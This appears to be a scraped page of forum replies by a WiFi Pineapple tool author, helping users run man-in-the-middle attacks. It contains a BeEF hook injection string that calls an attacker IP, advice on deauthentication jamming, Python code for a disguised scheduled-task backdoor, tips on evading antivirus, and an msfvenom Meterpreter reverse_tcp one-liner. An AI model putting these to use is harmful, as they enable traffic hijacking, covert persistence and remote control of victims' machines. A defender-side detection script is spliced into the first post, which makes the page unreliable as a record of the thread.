Posts posted by leg3nd

  1. Hi @leg3nd, I tried your infusion many times but never succeeded in injecting hook.js into traffic through my Pineapple. I configured my Pineapple to work in "client mode"; my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running the BeEF server. I SSH to the pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/".

    Everything seems OK, but when I test surfing the web through the pineapple, the HTML page is not injected; I checked the source code of the HTML response and it does not have hook.js.

    I don't know what's wrong. Can you help me? Thanks a lot!

    Same results when you try it from the infusion UI?

    An easy way to test if the strip-n-inject infusion is working is to inject a simple popup box:

    <script>alert("It worked!!");</script>

    Make sure you're not browsing on HTTPS directly because you cannot inject into encrypted HTTP traffic.
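    A defender-side way to spot this kind of injection in an HTTP response, added here as an example (it is not part of the strip-n-inject infusion or leg3nd's code); the sample HTML is constructed and reuses the hook address from the post above:

```python
"""Added defender-side check (not strip-n-inject code): flag <script src>
tags whose host is not the page's own host, and note when that host is a
private-range IP, which is how an in-path injector on the local network
(a hook served from 172.16.42.3, as above) shows up."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: plain-HTTP page with one injected tag, one legitimate script.
SAMPLE_HTML = """<html><head><title>Login</title>
<meta http-equiv="cache-control" content="no-cache" />
<script src="http://172.16.42.3:3000/hook.js" type="text/javascript"></script>
<script src="/static/app.js"></script>
</head><body><form action="/login" method="post"></form></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def is_private_ip(host):
    """True when host is an IP literal in a private or loopback range."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not an IP literal
    return addr.is_private or addr.is_loopback


def foreign_scripts(page_url, html, allowed_hosts=()):
    """Return [(src, reason), ...] for scripts loaded from a host other than the
    page's own and not in allowed_hosts (e.g. a known CDN). Relative URLs are
    same-host by definition and never flagged."""
    page_host = urlsplit(page_url).hostname
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged = []
    for src in parser.srcs:
        host = urlsplit(src).hostname
        if host is None or host == page_host or host in allowed_hosts:
            continue
        reason = "private-address host" if is_private_ip(host) else "cross-host"
        flagged.append((src, reason))
    return flagged
```

    Cross-host hits from known CDNs are expected on many sites, so feed those hosts in through allowed_hosts and treat the private-address hits as the ones worth investigating.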

  2. I'm having trouble with the jammer.

    It works fine in non-populated areas, but it only works once in populated areas. And by unpopulated, I mean with about 5 clients. I did change the code so it kills all aireplay-ng processes every 10 seconds, but it still works in non-populated areas. Strange.

    Here is the modified start_jammer.sh: http://pastebin.com/J7jmdtvx

    Edit: I modified it so it wouldn't crash.

    Your post doesn't really explain what you see when your problem occurs. DeAuth is always a balance of power consumption/stability when dealing with a large number of clients.

    That being said - I've used the aireplay-ng version with over 30 clients without an issue in the past.

  3. Running the BeEF server directly on the pineapple would be challenging because of the hardware requirements.. theoretically you could do it directly on the pineapple but it would affect the performance of your clients.

    You can use my script in my comment to use BeEF (jasagerPwn). I use the strip-n-inject module to prevent HTTPS and inject the BeEF hook into all the clients' HTTP requests. This provides a BeEF hook that's persistent as long as the client is on the pineapple. In this implementation I have the BeEF server running on the attacker machine.. this makes the installation and performance of the attack much better.

  4. Fixed a bug with DNS spoof's "spoofhosts" file location. On the newer firmware it was causing many of the attacks not to function properly. Please be sure you're running the latest firmware then update the script.

    ./jasagerPwn -u
    

    Also thinking about adding a client Heartbleed module here because I'm bored: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb

    Anyone interested in that?

  5. I notice there's a lot to talk about with SSLStrip.

    Just for example, the droid application for Facebook: has anyone had success preventing SSL on droid applications?

    It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.

    However, most application development teams, especially of the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake that Secure Development Life Cycles look to prevent.

  6. Good afternoon,

    I've been fooling around with the pineapple for a little while and am unable to get the Jammer infusion to work correctly.

    I was reading that wlan1 on the pineapple is the one that can be used to perform deauth attacks.

    So the first thing that I do is click on the Jammer Tile

    I then select wlan1 as my interface > start monitor

    choose mon0 as my monitor interface

    I go into some of the options like how many deauth packets to send and I usually choose 5

    I whitelist the AP that the pineapple is connected to through wlan0 (so that clients deauth'd will reconnect through the Pineapple).

    Then I click on start.

    When it starts I can see on my computer that there are no access points available anymore,

    but then the pineapple starts acting funny: the blue light (wlan0) AND red light (wlan1) both turn off, or it turns off completely and reboots itself.

    I'm using method aireplay-ng, have yet to try MDK3

    Am I doing something wrong?

    I can't find much support on this.

    I appreciate any help you can give me.

    What is your power source?

    Deauthentication is a power intensive process and unless you're on a well distributed, stable power source you could certainly have some instability and reboots.

  7. Hey there,

    a quick basic question, since I failed to get a working internet connection for the pineapple when running jasagerpwn today:

    The pineapple (mark IV) is connected at eth0 of my kali machine, which is connected to the net via wifi (wlan0), which I set up in the script. Do I need to disable the pineapple's routing for the script to run (like with the first jasagerpwn script)? Or is it just setting a static IP, running the wp4.sh with that IP and finally starting jasagerpwn?

    Thanks in advance,

    Carni

    PS:

    Just change this part in the script.

    This script is a bit different from the original jasagerPwn (which was very poorly designed). The script will not touch any network configurations regarding ICS because it's assumed that the internet connection will be configured on the pineapple directly (3G Dongle, WiFi ICS on Pineapple, etc).

    I'm sure you can run the internet through your laptop with the normal Linux ICS script. Since Hak5 did such a great job making general operating much more user friendly I didn't feel it was necessary to include any ICS configuration in the script.

  8. This looks great. I'm going to try it out on my pen test lab at home in coming days.

    A quick question about deauth... in jasagerPwn the first item in CONFIGURATION / VARIABLES is :-

    # [System Information]
    deauth_interface="wlan0" # Interface for local deauthentication attacks

    I'd prefer to use my Alfa 036H plugged into the WiFi Pineapple as wlan2. Does jasagerPwn allow you to select which interface you want to use to deauth clients?

    I know I'll find this out when I get everything set up properly... :-)

    Regards,

    Lunokhod

    Sorry if the comment was unclear, but that is intended for local deauthentication attacks (local being the attacker computer). If you would like to execute a deauth attack from the pineapple then I recommend using Whistle Master's "WiFi Jammer" infusion. I tend to perform deauth attacks from both depending on the physical situation (interference and signal strengths).

  9. So I've been trying to install JasagerPwn on the latest firmware, and it doesn't look like it's gonna work. I got it to install on Kali 1.05 OK, but I can't seem to get it from my Kali box to the pineapple. I really like the whole concept/idea of JasagerPwn Reborn. It sounds so bad ass. Do you think that I could inject those same exploits/payloads mentioned in this post with "strip-n-inject"? Sorry for asking, but I'm at my wits' end here. I've been reading this post all night and still haven't had any luck. Anyway, please hit me up.

    I'm going to need a bit more information. I haven't had much time to try the new pineapple firmwares, but I would guess it should still work fine. There really isn't much to "install" on the pineapple other than the infusions (dnsspoof, sslstrip, strip-n-inject) which the attack vectors utilize.

    What is the problem that's occurring? What steps should I take to reproduce your problem?

  10. Naw not anytime soon.. I can hack things together but don't care to spend my time doing web development.

    Standardization is a good thing imo. No point in reinventing the wheel.

    I guess if there became a need I might do it.. but I'm not much of a GUI fan to begin with.. I barely use it in my pentests to begin with.

  11. Hi leg3nd, good job.

    Take a look at this repo: https://github.com/xtr4nge/sslstrip

    Response tamperer support (@kkotowicz) and Code Injection (@xtr4nge) were implemented in the same SSLStrip fork.

    Options:
    -t <config>, --tamper <config>    Enable response tampering with settings from <config>.
    -i , --inject                     Inject code into HTML pages using a text file (default inject.txt)
    

    For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

    Also you can implement more advanced attacks using the -t option.

    I'm adding these functionalities to my project this week.

    regards,

    Very cool.

    Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

    Thanks!

  12. Don't know that the exception matters; it's loading my meterpreters just fine.

    Yes.. this is using 32 bit shellcode and is compiled into a 32 bit binary that can be used on both 32/64 bit platforms. You'll need to change things if you want it to be purely 64 bit - but that will not work on 32 bit platforms.. so I don't get what you're trying to do.

    I also don't see much point in deploying this as a python script since 99% of people don't have python installed.

  13. Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicious executable as a user browses. The main purpose I made this infusion for was the attack vectors I have in JasagerPwn.

    The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output.

    Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.

  14. I doubt it's a problem with the shellcode but I'll give it a try now.

    If I can't solve it messing around I'll wait for your update :P I'll let you know if I find out something.

    Thanks again, I owe you one!

    Updated. I changed out the process injection for a simpler direct shellcode execution.. this will work on both 32 and 64 bit Windows 7 and is much more stable since it doesn't touch external memory or process space.

    If you want to migrate you can just use metasploit for that. I believe they have a new "set PrependMigrate true" option, or AutoRunScript "migrate -f -k".

    Let me know how this one works for you.

    EDIT: On an unrelated note - I just added in a Metasploit BrowserPwn invisible iFrame injection attack. This will allow the victim to browse normally while they are sslstripped and have exploits injected into the browser in the background.

  15. Not sure off the top of my head.. I'll do some playing with it this weekend and check if it's a memory manipulation issue. I've never tested this with 64 bit shellcode so it could be problematic.

    I generated both 32 bit and 64 bit shellcode with your address. The 32 bit is 389 characters and the 64 bit is 565 characters.

    Here is the shellcode I generated (with your IPs): http://paste.pound-python.org/show/McfvJRisjSZYcjbYVfm0/

    If this doesn't work just keep poking at it or wait until I release a new version this weekend.

  16. Yup, but it's not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P

    Thanks for your patience :PP

    The script can copy the current executable to the temporary directory with some name like WRE8285.exe and then use THAT as the schtasks backdoor.

    I have that currently implemented in the powershell-https payload.. here is the relevant code:

    import os
    import subprocess
    import sys

    exe_loc = str(sys.executable)  # path of the running executable (the EXE once compiled)
    backdoor_loc = os.getenv('TEMP') + '\\' + "WRE8284.exe"
    # copy the executable to the temp directory; the scheduled task then references that copy
    proc = subprocess.Popen("copy /y %s %s" % (exe_loc, backdoor_loc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    

    Then in the XML file I'm generating, replace this:

    ....." + exe_loc + ".....
    

    with this:

    ....." + backdoor_loc + "..... 

    This is the file you can reference that already does this (I'll add this to inject.py with other improvements later on): https://code.google.com/p/jasagerpwn-reborn/source/browse/trunk/resources/meterpreter_powershell-HTTPS/powershell-https.py

    A cleartext python script will always have a chance to trigger AV. Compiling it will help a lot with that.

  17. Yeah currently it will think the python.exe is the current executable.. which technically it is since you're running it through the interpreter.

    This was designed to be run as an EXE for obvious reasons, in which case that line is fine.

    However, if you insist on using the interpreter your change will work:

    exe_loc = "C:\Users\myusername\Desktop\inject.py"

  18. I won't be officially supporting the MK4.

    Currently, some of the attacks will work such as Fake Update and Java Applet Redirect - however there is no "Strip-N-Inject" infusion for the MK4 so none of those attacks will work. When I'm doing future development for JasagerPwn it will be targeted for the MK5 and won't have much consideration for backwards compatibility with the MK4.

  19. Hmmm... yes I understand the issue here. The problem is that injecting 32 bit shellcode into a 64 bit process will fail (explorer.exe is 64 bit).

    There are 2 potential solutions here:

    1. Choose a 32 bit process: Even though the machine is 64-bit, it should work with a 32bit process.
      1. Look in task manager for a process with *32 on the end of it and try using that process instead. The problem here is that most default processes on a 64 bit systems will be 64 bit.
    2. Use 64bit shellcode: You can modify that command a bit to generate 64 bit shellcode.
    data=$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'
    

    This will work for your testing purposes and for exploiting a targeted architecture.. but this is a crappy solution at the end of the day since it's not architecture agnostic. I'll come up with a foolproof solution this weekend... just need to brainstorm a bit.

  20. hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.

    anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

    I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment it's all networking and Windows Server at school, which is also taking a lot of time now...

    Got to make choices man but love your infusion ;-)

    The great thing is that you don't need to know programming to mount these attacks. That's what this script is for: https://forums.hak5.org/index.php?showtopic=30588

    It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell.

    Add logging and I won't have a use for the SSLStrip infusion.

    I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.

  21. If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it.

    I'm sure you can theoretically do that but going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors.

    If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies.

  22. Cool, please report any bugs so I can get em fixed up.

    This is my advice with the SSLstrip issues:

    • If SSLStrip is already working for you: don't press install because it will "just work" regardless of whether it's "not installed"
    • If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installations

    This is basically the install script if you feel like trying it manually:

    opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web
    
    if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
      ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
    fi
    
    if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
      ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
    fi
    
    